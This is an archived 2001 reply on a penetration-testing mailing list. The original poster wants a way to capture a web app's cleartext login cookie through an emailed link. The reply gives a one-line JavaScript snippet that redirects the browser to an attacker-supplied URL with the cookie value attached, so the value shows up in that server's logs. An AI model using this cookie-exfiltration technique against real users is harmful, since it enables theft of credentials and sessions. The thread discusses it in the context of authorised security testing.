Re: Wanted: Script to email cookies
From: rudi carell (rudicarell@hotmail.com)Date: 12/03/01
- Previous message: Kevin Spett: "Re: SQL Code"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: "rudi carell" <rudicarell@hotmail.com> To: joe_brown@senet-int.com, pen-test@securityfocus.com Date: Mon, 03 Dec 2001 09:19:40
Joe,
>I'm working on a pen test for a web application. After
>the first time you successfully authenticate, the app
>stores a cookie with username and password in clear
>text. I've recently read the archive regarding
>vulnerable IE browsers revealing cookies. I'd like to
>go a step farther. Does anyone have a script that will
>email the cookie? I'd like to craft an email with a link
>and when a user clicks, it emails the cookie.
.. not really necessary .. javascript:location.href=yoururl?[found cookie
value]
.. creates log-file entry with cookie value on (hopefully)your server ...
rC
security@freefly.com
http://www.freefly.com/security/
_________________________________________________________________
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp
----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
- Previous message: Kevin Spett: "Re: SQL Code"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
